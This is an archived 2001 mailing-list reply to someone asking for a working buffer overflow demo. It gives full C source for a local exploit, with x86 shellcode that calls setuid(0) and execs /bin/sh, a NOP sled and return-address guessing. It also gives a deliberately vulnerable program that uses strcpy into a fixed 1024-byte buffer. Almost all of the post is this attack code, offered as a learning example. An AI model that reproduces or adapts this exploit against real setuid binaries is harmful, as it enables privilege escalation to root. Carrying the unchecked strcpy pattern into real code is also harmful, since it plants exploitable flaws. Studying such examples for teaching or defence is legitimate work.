Re: Buffer Overflow Example

From: Tobias Klein (tobias.kleinat_private)
Date: Thu Apr 19 2001 - 02:26:04 PDT

Next message: Crispin Cowan: "Digex TruDefense?"

Previous message: Keith.Morgan: "Re: Hijack IP Address using cable modem (fwd)"
In reply to: Dorian_Andreatteat_private: "Buffer Overflow Example"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

At 09:46 AM 4/18/01 -0700, you wrote:
>I have been searching for a very simple bufferflow example, and I  couldn't
>get a working example.
>
>  I would like 2 things.
>
>1: A simple C program that I can install as root (i'll give the setuid as
>ROOT) that causes a seg fault if overflowed.
>2: An exploit program that I will install as a user that will overflow the
>other program and spawn a shell
>with the priviliges as other program.
>
>If someone could send me or tell me where to get a WORKING example of this
>with source included, that would be great. I
>
>Thanks,
>
>Darius

here is a litte lame example from me
the offset is on my  box 500  (debian) you can try it in 50 steps 50, 100,
150, ...

iam sorry 4 my bad english

Happy lerning!!!
newroot

<snip>
/*
         Lame Bufferoverflow exaple written by newroot
         newrootat_private
         worked on Debian-Linux whith offset 200-500
         happy lerning :-)
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET                    1
#define BUFFER                          2048
#define OVERSIZE                           8
#define RET                       0xbffff50b
#define NOP                            0x90

char shellcode[] =
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid (0x0); code written by
newroot */
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp (void)
{
         __asm__("movl %esp, %eax");
}

int main (int argc, char **argv)
{
         char buffer [BUFFER+OVERSIZE+1];
         unsigned long sp;
         long addy;
         int offset = 0;
         int i;

         if (argc > 1) {
                 sp = get_sp ();
                 offset = atoi (argv[1]);
                 addy = sp - offset;
         }
         else addy = RET;

         printf ("Trying adress: %x\n", addy);
         for (i=BUFFER; i< BUFFER+OVERSIZE; i+=4)
                 *(long*)&buffer[i] = addy;

         memset (buffer, 0x90, BUFFER-strlen(shellcode));
         memcpy (buffer + BUFFER - strlen (shellcode), shellcode,
strlen(shellcode));

         buffer[BUFFER+OVERSIZE] = '\0';
         printf ("Buffer %s\n", buffer);

         execl ("./vun", "buffer", buffer, NULL);

         return 0;
}


</snip>

<snip>

#include <stdio.h>
#include <string.h>


void lame (char *buff)
{
         char big [1024];      // <- i know this an bad example
         char small [1024];  // too

         strcpy (small, buff);
         printf ("Small: %s\n", small);
}

int main(int argc, char **argv)
{

         if  (argc > 1) {
                 lame (argv[1]);
         }


         return 0;
}


</snip>

application/x-compressed attachment: stack.tgz

EWE TEL GmbH Tobias Klein Tel.: +49(0)441/8000-1572 Projekte & Mehrwertdienste Fax: +49(0)441/8000-1599 Cloppenburger Straße 310 tobias.kleinat_private D-26133 Oldenburg

Next message: Crispin Cowan: "Digex TruDefense?"
Previous message: Keith.Morgan: "Re: Hijack IP Address using cable modem (fwd)"
In reply to: Dorian_Andreatteat_private: "Buffer Overflow Example"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 20 2001 - 04:21:11 PDT